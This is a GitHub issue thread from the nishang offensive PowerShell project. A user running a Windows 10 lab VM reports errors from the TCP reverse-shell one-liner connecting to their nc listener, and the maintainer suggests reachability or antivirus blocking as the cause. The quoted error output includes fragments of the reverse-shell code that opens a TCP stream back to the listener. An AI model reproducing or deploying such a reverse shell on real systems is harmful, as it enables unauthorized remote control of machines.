### ISSUE TITLE
Invoke-PowerShelltcpOneLine Windows10 errors

### ISSUE THREAD

**Issue by monomaki2035** [samratashok/nishang#71]
lately i have been getting this error when running the Tcp oneliner in Windows10

New-Object : Exception calling ".ctor" with "2" argument(s): "A socket operation was attempted to an unreachable
network 192.168.1.10:8888"
At line:2 char:11
+ $client = New-Object System.Net.Sockets.TCPClient('192.168.1.10',8888);$s ...
+           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [New-Object], MethodInvocationException
    + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.
At line:2 char:68
+ ... kets.TCPClient('192.168.1.10',8888);$stream = $client.GetStream();[byte[] ...
+                                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:136
+ ... 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ...
+                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.
At line:2 char:484
+ ... .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+                                                           ~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

Which is strange i usually dont have any problems during my tests any help would be Golden

**Comment by samratashok** [comment]
Are you sure 192.168.1.10 is reachable? The error says 'A socket operation was attempted to an unreachable network'

**Comment by monomaki2035** [comment]
I Am pretty sure 192.168.1.10 is reachable Its my usual set up, I run a Windows10 Vm on my Linux Lab PC with a nc listener usually with no problems

**Comment by samratashok** [comment]
You may like to check if there is some sort of blocking by antivirus. Do you get a similar error when you try Invoke-PowerShellTCP? (not the one liner)

**Comment by monomaki2035** [comment]
I don't have access to my Win10 VM at the moment however the TCPOnliner seems to work as expected on My Windows7 box ill keep u posted on any new developments Thank you for prompt response and creating such a magnificent Tool.
